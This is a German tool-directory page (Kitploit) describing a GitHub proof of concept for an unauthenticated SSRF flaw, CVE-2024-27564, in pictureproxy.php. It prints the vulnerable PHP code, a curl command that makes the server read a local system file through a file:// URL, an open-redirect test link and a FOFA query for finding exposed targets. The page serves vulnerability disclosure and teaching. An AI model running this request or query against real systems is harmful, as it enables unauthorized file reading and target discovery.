Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
SSRF-Exploit-CVE-2024-27564 | Kitploit
Tools/GitHubGitHub/chaudhrymuhammadtayab/ssrf-exploit-cve-2024-27564
AufklärungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubchaudhrymuhammadtayab/ssrf-exploit-cve-2024-27564

SSRF-Exploit-CVE-2024-27564

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
1vor 1 JahrNoch nicht geprüft

SSRF-Exploit-CVE-2024-27564

Projekttitel

Dieses Projekt demonstriert eine Server-Side-Request-Forgery-Schwachstelle (SSRF) in der Datei pictureproxy.php.

Beschreibung

Eine Schwachstelle in pictureproxy.php erlaubt es entfernten Angreifern, beliebige Anfragen durchzuführen, indem URLs in den Parameter url injiziert werden. Diese SSRF-Schwachstelle kann ohne Authentifizierung ausgenutzt werden, was sie besonders gefährlich macht.

Der verwundbare Code befindet sich in der Datei pictureproxy.php. Das Problem entsteht, weil die Funktion den Parameter url nicht ordnungsgemäß validiert. Die Variable $_GET['url'] wird an die Funktion file_get_contents() übergeben, die den Inhalt der angegebenen URL abruft. Dies kann zu SSRF führen.

Proof of Concept

Hier ist ein einfacher Proof of Concept, der zeigt, wie die Schwachstelle ausgenutzt werden kann:

root@kitploit:~
<?php
if (isset($_GET['url'])) {
    $image = file_get_contents($_GET['url']);
    header("Content-type: image/jpeg");
    echo $image;
} else {
    echo "Invalid request";
}

Zum Testen der Schwachstelle können Sie den folgenden curl-Befehl verwenden:

root@kitploit:~
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password

Getestet mit offener Weiterleitung

Ein Test mit einer offenen Weiterleitungsschwachstelle:

root@kitploit:~
https://64.media.tumblr.com/f07b73b374dc2ff6d5e4dbf39d2a6467/tumblr_nvani31DCm1u5url1o1_1280.jpg

Banner

Tools

  • FOFA: Eine Suchmaschine für Internetgeräte und Schwachstellen. Verwenden Sie den folgenden Befehl, um nach relevanten Ergebnissen zu suchen:
root@kitploit:~
"title="ChatGPT个人专用版""

Fazit

Dieses Projekt verdeutlicht, wie wichtig die ordnungsgemäße Validierung von Benutzereingaben ist, um SSRF-Schwachstellen zu vermeiden. Stellen Sie immer sicher, dass Parameter wie URLs gründlich überprüft werden, bevor sie verarbeitet werden.

Tool herunterladen